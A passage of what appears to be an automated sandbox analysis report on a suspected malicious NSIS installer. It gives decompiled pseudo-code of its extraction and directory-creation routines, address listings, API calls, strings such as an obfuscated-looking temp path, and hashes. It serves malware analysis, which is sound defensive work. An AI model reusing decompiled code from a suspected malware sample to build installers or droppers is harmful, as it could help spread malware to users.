                                                                                                                                                                            						__eflags = _t93 -  *0x4168c4; // 0x48ca0
                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                            							_v12 = E00406107(_v12, 0x4168c8, _t90);
                                                                                                                                                                            						}
                                                                                                                                                                            						 *0x40a8b8 =  *0x40a8b8 + _t90;
                                                                                                                                                                            						_t93 = _t93 - _t90;
                                                                                                                                                                            						__eflags = _t93;
                                                                                                                                                                            					} while (_t93 > 0);
                                                                                                                                                                            					_t82 = 0;
                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                            					goto L24;
                                                                                                                                                                            				}
                                                                                                                                                                            			}































                                                                                                                                                                            0x00402c6e
                                                                                                                                                                            0x00402c71
                                                                                                                                                                            0x00402c74
                                                                                                                                                                            0x00402c77
                                                                                                                                                                            0x00402c7d
                                                                                                                                                                            0x00402c8e
                                                                                                                                                                            0x00402c93
                                                                                                                                                                            0x00402ca6
                                                                                                                                                                            0x00402cab
                                                                                                                                                                            0x00402cae
                                                                                                                                                                            0x00402cb4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402cb6
                                                                                                                                                                            0x00402cc1
                                                                                                                                                                            0x00402cc7
                                                                                                                                                                            0x00402cd8
                                                                                                                                                                            0x00402cdf
                                                                                                                                                                            0x00402ce5
                                                                                                                                                                            0x00402ce7
                                                                                                                                                                            0x00402cec
                                                                                                                                                                            0x00402cee
                                                                                                                                                                            0x00402ddb
                                                                                                                                                                            0x00402ddd
                                                                                                                                                                            0x00402de2
                                                                                                                                                                            0x00402de9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402deb
                                                                                                                                                                            0x00402dee
                                                                                                                                                                            0x00402e12
                                                                                                                                                                            0x00402e17
                                                                                                                                                                            0x00402e1d
                                                                                                                                                                            0x00402e28
                                                                                                                                                                            0x00402e2d
                                                                                                                                                                            0x00402e30
                                                                                                                                                                            0x00402e31
                                                                                                                                                                            0x00402e32
                                                                                                                                                                            0x00402e34
                                                                                                                                                                            0x00402e39
                                                                                                                                                                            0x00402e3c
                                                                                                                                                                            0x00402e4f
                                                                                                                                                                            0x00402e53
                                                                                                                                                                            0x00402e5b
                                                                                                                                                                            0x00402e60
                                                                                                                                                                            0x00402e62
                                                                                                                                                                            0x00402e62
                                                                                                                                                                            0x00402e62
                                                                                                                                                                            0x00402e6a
                                                                                                                                                                            0x00402e6a
                                                                                                                                                                            0x00402e6d
                                                                                                                                                                            0x00402e6e
                                                                                                                                                                            0x00402e6e
                                                                                                                                                                            0x00402e71
                                                                                                                                                                            0x00402e73
                                                                                                                                                                            0x00402e73
                                                                                                                                                                            0x00402e73
                                                                                                                                                                            0x00402e7d
                                                                                                                                                                            0x00402e83
                                                                                                                                                                            0x00402e91
                                                                                                                                                                            0x00402e96
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402e96
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402e3c
                                                                                                                                                                            0x00402df6
                                                                                                                                                                            0x00402e01
                                                                                                                                                                            0x00402e06
                                                                                                                                                                            0x00402e08
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402e0d
                                                                                                                                                                            0x00402e10
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402cf4
                                                                                                                                                                            0x00402cf9
                                                                                                                                                                            0x00402cfe
                                                                                                                                                                            0x00402d02
                                                                                                                                                                            0x00402d09
                                                                                                                                                                            0x00402d0e
                                                                                                                                                                            0x00402d10
                                                                                                                                                                            0x00402d12
                                                                                                                                                                            0x00402d12
                                                                                                                                                                            0x00402d16
                                                                                                                                                                            0x00402d1b
                                                                                                                                                                            0x00402d1d
                                                                                                                                                                            0x00402e47
                                                                                                                                                                            0x00402e3e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402e3e
                                                                                                                                                                            0x00402d23
                                                                                                                                                                            0x00402d2a
                                                                                                                                                                            0x00402da6
                                                                                                                                                                            0x00402daa
                                                                                                                                                                            0x00402dae
                                                                                                                                                                            0x00402db3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402daa
                                                                                                                                                                            0x00402d33
                                                                                                                                                                            0x00402d38
                                                                                                                                                                            0x00402d3b
                                                                                                                                                                            0x00402d40
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402d42
                                                                                                                                                                            0x00402d49
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402d4b
                                                                                                                                                                            0x00402d52
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402d54
                                                                                                                                                                            0x00402d5b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402d5d
                                                                                                                                                                            0x00402d64
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402d66
                                                                                                                                                                            0x00402d6c
                                                                                                                                                                            0x00402d75
                                                                                                                                                                            0x00402d7b
                                                                                                                                                                            0x00402d7e
                                                                                                                                                                            0x00402d80
                                                                                                                                                                            0x00402d86
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402d8c
                                                                                                                                                                            0x00402d90
                                                                                                                                                                            0x00402d98
                                                                                                                                                                            0x00402d98
                                                                                                                                                                            0x00402d9b
                                                                                                                                                                            0x00402d9b
                                                                                                                                                                            0x00402d9e
                                                                                                                                                                            0x00402da0
                                                                                                                                                                            0x00402da2
                                                                                                                                                                            0x00402da2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402da0
                                                                                                                                                                            0x00402d92
                                                                                                                                                                            0x00402d96
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402db4
                                                                                                                                                                            0x00402db4
                                                                                                                                                                            0x00402dba
                                                                                                                                                                            0x00402dc6
                                                                                                                                                                            0x00402dc6
                                                                                                                                                                            0x00402dc9
                                                                                                                                                                            0x00402dcf
                                                                                                                                                                            0x00402dd1
                                                                                                                                                                            0x00402dd1
                                                                                                                                                                            0x00402dd9
                                                                                                                                                                            0x00402dd9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402dd9

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,00000400), ref: 00402C93
                                                                                                                                                                              • Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,80000000,00000003), ref: 00405970
                                                                                                                                                                              • Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,80000000,00000003), ref: 00402CDF
                                                                                                                                                                            Strings
                                                                                                                                                                            • Inst, xrefs: 00402D4B
                                                                                                                                                                            • "C:\Users\user\Desktop\Jjfmcz1Hsz.exe", xrefs: 00402C66
                                                                                                                                                                            • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                                                                                                            • Error launching installer, xrefs: 00402CB6
                                                                                                                                                                            • soft, xrefs: 00402D54
                                                                                                                                                                            • Null, xrefs: 00402D5D
                                                                                                                                                                            • C:\Users\user\Desktop\Jjfmcz1Hsz.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\Jjfmcz1Hsz.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Jjfmcz1Hsz.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                            • API String ID: 4283519449-1875976939
                                                                                                                                                                            • Opcode ID: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
                                                                                                                                                                            • Instruction ID: 1839f4375b44da3097aca9d4a8c6c84b0463c2d100b7a2d698c12080187f488f
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
                                                                                                                                                                            • Instruction Fuzzy Hash: BF51B6B1A41214ABDF109F65DE89B9E7AB4EF00355F14403BF904B62D1C7BC9E418B9D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 824 401751-401774 call 402a3a call 4057d8 829 401776-40177c call 405cf9 824->829 830 40177e-401790 call 405cf9 call 40576b lstrcatA 824->830 835 401795-40179b call 405f64 829->835 830->835 840 4017a0-4017a4 835->840 841 4017a6-4017b0 call 405ffd 840->841 842 4017d7-4017da 840->842 850 4017c2-4017d4 841->850 851 4017b2-4017c0 CompareFileTime 841->851 843 4017e2-4017fe call 40596c 842->843 844 4017dc-4017dd call 405947 842->844 852 401800-401803 843->852 853 401876-40189f call 404f12 call 402e9f 843->853 844->843 850->842 851->850 854 401805-401847 call 405cf9 * 2 call 405d1b call 405cf9 call 4054ef 852->854 855 401858-401862 call 404f12 852->855 867 4018a1-4018a5 853->867 868 4018a7-4018b3 SetFileTime 853->868 854->840 887 40184d-40184e 854->887 865 40186b-401871 855->865 870 4028d8 865->870 867->868 869 4018b9-4018c4 CloseHandle 867->869 868->869 872 4018ca-4018cd 869->872 873 4028cf-4028d2 869->873 874 4028da-4028de 870->874 876 4018e2-4018e5 call 405d1b 872->876 877 4018cf-4018e0 call 405d1b lstrcatA 872->877 873->870 883 4018ea-402269 876->883 877->883 888 40226e-402273 883->888 889 402269 call 4054ef 883->889 887->865 890 401850-401851 887->890 888->874 889->888 890->855
                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                            			E00401751(FILETIME* __ebx, void* __eflags) {
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				void* _t43;
                                                                                                                                                                            				FILETIME* _t49;
                                                                                                                                                                            				FILETIME* _t62;
                                                                                                                                                                            				void* _t64;
                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                            				FILETIME* _t71;
                                                                                                                                                                            				FILETIME* _t75;
                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                            				void* _t80;
                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                            				CHAR* _t83;
                                                                                                                                                                            				void* _t85;
                                                                                                                                                                            
                                                                                                                                                                            				_t75 = __ebx;
                                                                                                                                                                            				_t82 = E00402A3A(0x31);
                                                                                                                                                                            				 *(_t85 - 8) = _t82;
                                                                                                                                                                            				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                                                                                                            				_t33 = E004057D8(_t82);
                                                                                                                                                                            				_push(_t82);
                                                                                                                                                                            				_t83 = "Call";
                                                                                                                                                                            				if(_t33 == 0) {
                                                                                                                                                                            					lstrcatA(E0040576B(E00405CF9(_t83, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical\\Micala\\aarhundredeskiftet\\Dichroitic30\\Climaxed")), ??);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					E00405CF9();
                                                                                                                                                                            				}
                                                                                                                                                                            				E00405F64(_t83);
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					__eflags =  *(_t85 + 8) - 3;
                                                                                                                                                                            					if( *(_t85 + 8) >= 3) {
                                                                                                                                                                            						_t64 = E00405FFD(_t83);
                                                                                                                                                                            						_t77 = 0;
                                                                                                                                                                            						__eflags = _t64 - _t75;
                                                                                                                                                                            						if(_t64 != _t75) {
                                                                                                                                                                            							_t71 = _t64 + 0x14;
                                                                                                                                                                            							__eflags = _t71;
                                                                                                                                                                            							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                                                                                                            						}
                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                            						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                                                                                            						__eflags = _t70;
                                                                                                                                                                            						 *(_t85 + 8) = _t70;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                                                            					if( *(_t85 + 8) == _t75) {
                                                                                                                                                                            						E00405947(_t83);
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t85 + 8) - 1;
                                                                                                                                                                            					_t41 = E0040596C(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                                                                                            					__eflags = _t41 - 0xffffffff;
                                                                                                                                                                            					 *(_t85 - 0xc) = _t41;
                                                                                                                                                                            					if(_t41 != 0xffffffff) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                                                            					if( *(_t85 + 8) != _t75) {
                                                                                                                                                                            						E00404F12(0xffffffe2,  *(_t85 - 8));
                                                                                                                                                                            						__eflags =  *(_t85 + 8) - 2;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                                                                                            						}
                                                                                                                                                                            						L31:
                                                                                                                                                                            						 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t85 - 4));
                                                                                                                                                                            						__eflags =  *0x423788;
                                                                                                                                                                            						goto L32;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E00405CF9(0x409be8, 0x424000);
                                                                                                                                                                            						E00405CF9(0x424000, _t83);
                                                                                                                                                                            						E00405D1B(_t75, 0x409be8, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsl1543.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                                                                                                            						E00405CF9(0x424000, 0x409be8);
                                                                                                                                                                            						_t62 = E004054EF("C:\Users\Arthur\AppData\Local\Temp\nsl1543.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                                                                                                            						__eflags = _t62;
                                                                                                                                                                            						if(_t62 == 0) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags = _t62 == 1;
                                                                                                                                                                            							if(_t62 == 1) {
                                                                                                                                                                            								 *0x423788 =  &( *0x423788->dwLowDateTime);
                                                                                                                                                                            								L32:
                                                                                                                                                                            								_t49 = 0;
                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_push(_t83);
                                                                                                                                                                            								_push(0xfffffffa);
                                                                                                                                                                            								E00404F12();
                                                                                                                                                                            								L29:
                                                                                                                                                                            								_t49 = 0x7fffffff;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					L33:
                                                                                                                                                                            					return _t49;
                                                                                                                                                                            				}
                                                                                                                                                                            				E00404F12(0xffffffea,  *(_t85 - 8));
                                                                                                                                                                            				 *0x4237b4 =  *0x4237b4 + 1;
                                                                                                                                                                            				_push(_t75);
                                                                                                                                                                            				_push(_t75);
                                                                                                                                                                            				_push( *(_t85 - 0xc));
                                                                                                                                                                            				_push( *((intOrPtr*)(_t85 - 0x20)));
                                                                                                                                                                            				_t43 = E00402E9F(); // executed
                                                                                                                                                                            				 *0x4237b4 =  *0x4237b4 - 1;
                                                                                                                                                                            				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                                                                                                            				_t80 = _t43;
                                                                                                                                                                            				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                                                                                                            					L22:
                                                                                                                                                                            					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                                                                                                            					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                                                                                                            						goto L22;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				CloseHandle( *(_t85 - 0xc)); // executed
                                                                                                                                                                            				__eflags = _t80 - _t75;
                                                                                                                                                                            				if(_t80 >= _t75) {
                                                                                                                                                                            					goto L31;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__eflags = _t80 - 0xfffffffe;
                                                                                                                                                                            					if(_t80 != 0xfffffffe) {
                                                                                                                                                                            						E00405D1B(_t75, _t80, _t83, _t83, 0xffffffee);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E00405D1B(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                                                                                                                                            						lstrcatA(_t83,  *(_t85 - 8));
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(0x200010);
                                                                                                                                                                            					_push(_t83);
                                                                                                                                                                            					E004054EF();
                                                                                                                                                                            					goto L29;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L33;
                                                                                                                                                                            			}

















                                                                                                                                                                            0x00401751
                                                                                                                                                                            0x00401758
                                                                                                                                                                            0x00401761
                                                                                                                                                                            0x00401764
                                                                                                                                                                            0x00401767
                                                                                                                                                                            0x0040176c
                                                                                                                                                                            0x0040176d
                                                                                                                                                                            0x00401774
                                                                                                                                                                            0x00401790
                                                                                                                                                                            0x00401776
                                                                                                                                                                            0x00401777
                                                                                                                                                                            0x00401777
                                                                                                                                                                            0x00401796
                                                                                                                                                                            0x004017a0
                                                                                                                                                                            0x004017a0
                                                                                                                                                                            0x004017a4
                                                                                                                                                                            0x004017a7
                                                                                                                                                                            0x004017ac
                                                                                                                                                                            0x004017ae
                                                                                                                                                                            0x004017b0
                                                                                                                                                                            0x004017b5
                                                                                                                                                                            0x004017b5
                                                                                                                                                                            0x004017c0
                                                                                                                                                                            0x004017c0
                                                                                                                                                                            0x004017d1
                                                                                                                                                                            0x004017d3
                                                                                                                                                                            0x004017d3
                                                                                                                                                                            0x004017d4
                                                                                                                                                                            0x004017d4
                                                                                                                                                                            0x004017d7
                                                                                                                                                                            0x004017da
                                                                                                                                                                            0x004017dd
                                                                                                                                                                            0x004017dd
                                                                                                                                                                            0x004017e4
                                                                                                                                                                            0x004017f3
                                                                                                                                                                            0x004017f8
                                                                                                                                                                            0x004017fb
                                                                                                                                                                            0x004017fe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00401800
                                                                                                                                                                            0x00401803
                                                                                                                                                                            0x0040185d
                                                                                                                                                                            0x00401862
                                                                                                                                                                            0x004015a8
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004028cf
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00401805
                                                                                                                                                                            0x0040180b
                                                                                                                                                                            0x00401816
                                                                                                                                                                            0x00401823
                                                                                                                                                                            0x0040182e
                                                                                                                                                                            0x00401844
                                                                                                                                                                            0x00401844
                                                                                                                                                                            0x00401847
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040184d
                                                                                                                                                                            0x0040184d
                                                                                                                                                                            0x0040184e
                                                                                                                                                                            0x0040186b
                                                                                                                                                                            0x004028d8
                                                                                                                                                                            0x004028d8
                                                                                                                                                                            0x004028d8
                                                                                                                                                                            0x00401850
                                                                                                                                                                            0x00401850
                                                                                                                                                                            0x00401851
                                                                                                                                                                            0x00401492
                                                                                                                                                                            0x0040226e
                                                                                                                                                                            0x0040226e
                                                                                                                                                                            0x0040226e
                                                                                                                                                                            0x0040184e
                                                                                                                                                                            0x00401847
                                                                                                                                                                            0x004028da
                                                                                                                                                                            0x004028de
                                                                                                                                                                            0x004028de
                                                                                                                                                                            0x0040187b
                                                                                                                                                                            0x00401880
                                                                                                                                                                            0x00401886
                                                                                                                                                                            0x00401887
                                                                                                                                                                            0x00401888
                                                                                                                                                                            0x0040188b
                                                                                                                                                                            0x0040188e
                                                                                                                                                                            0x00401893
                                                                                                                                                                            0x00401899
                                                                                                                                                                            0x0040189d
                                                                                                                                                                            0x0040189f
                                                                                                                                                                            0x004018a7
                                                                                                                                                                            0x004018b3
                                                                                                                                                                            0x004018a1
                                                                                                                                                                            0x004018a1
                                                                                                                                                                            0x004018a5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004018a5
                                                                                                                                                                            0x004018bc
                                                                                                                                                                            0x004018c2
                                                                                                                                                                            0x004018c4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004018ca
                                                                                                                                                                            0x004018ca
                                                                                                                                                                            0x004018cd
                                                                                                                                                                            0x004018e5
                                                                                                                                                                            0x004018cf
                                                                                                                                                                            0x004018d2
                                                                                                                                                                            0x004018db
                                                                                                                                                                            0x004018db
                                                                                                                                                                            0x004018ea
                                                                                                                                                                            0x004018ef
                                                                                                                                                                            0x00402269
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402269
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed,00000000,00000000,00000031), ref: 00401790
                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed,00000000,00000000,00000031), ref: 004017BA
                                                                                                                                                                              • Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06
                                                                                                                                                                              • Part of subcall function 00404F12: lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                                                                                                                                                              • Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                                                                                                                                                              • Part of subcall function 00404F12: lstrcatA.KERNEL32(0041F4E8,00402FCF,00402FCF,0041F4E8,00000000,0040E8C0,00000000), ref: 00404F6E
                                                                                                                                                                              • Part of subcall function 00404F12: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 00404F80
                                                                                                                                                                              • Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                                                                                                                                                              • Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                                                                                                                                                              • Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed$C:\Users\user\AppData\Local\Temp\nsl1543.tmp$C:\Users\user\AppData\Local\Temp\nsl1543.tmp\System.dll$Call
                                                                                                                                                                            • API String ID: 1941528284-2670081855
                                                                                                                                                                            • Opcode ID: 44ecab9e1ef5e24c1ff596ae454948ee53cb588ab7073804ea6e55edc91cb487
                                                                                                                                                                            • Instruction ID: dfa66b7161a0f16b13ad00a25904a83b243dedeb6ee7557d1be3b523159fd244
                                                                                                                                                                            • Opcode Fuzzy Hash: 44ecab9e1ef5e24c1ff596ae454948ee53cb588ab7073804ea6e55edc91cb487
                                                                                                                                                                            • Instruction Fuzzy Hash: 5641D572910515BACF107BB5CC85EAF3679EF45329B20823BF521F20E2D63C4A419B6D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 891 4053d8-405423 CreateDirectoryA 892 405425-405427 891->892 893 405429-405436 GetLastError 891->893 894 405450-405452 892->894 893->894 895 405438-40544c SetFileSecurityA 893->895 895->892 896 40544e GetLastError 895->896 896->894
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E004053D8(CHAR* _a4) {
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                                                                            				int _t22;
                                                                                                                                                                            				long _t23;
                                                                                                                                                                            
                                                                                                                                                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                                                                            				_v36.Owner = 0x407374;
                                                                                                                                                                            				_v36.Group = 0x407374;
                                                                                                                                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                                                                            				_v36.Revision = 1;
                                                                                                                                                                            				_v36.Control = 4;
                                                                                                                                                                            				_v36.Dacl = 0x407364;
                                                                                                                                                                            				_v16.nLength = 0xc;
                                                                                                                                                                            				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                                                                                                                                            				if(_t22 != 0) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t23 = GetLastError();
                                                                                                                                                                            				if(_t23 == 0xb7) {
                                                                                                                                                                            					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
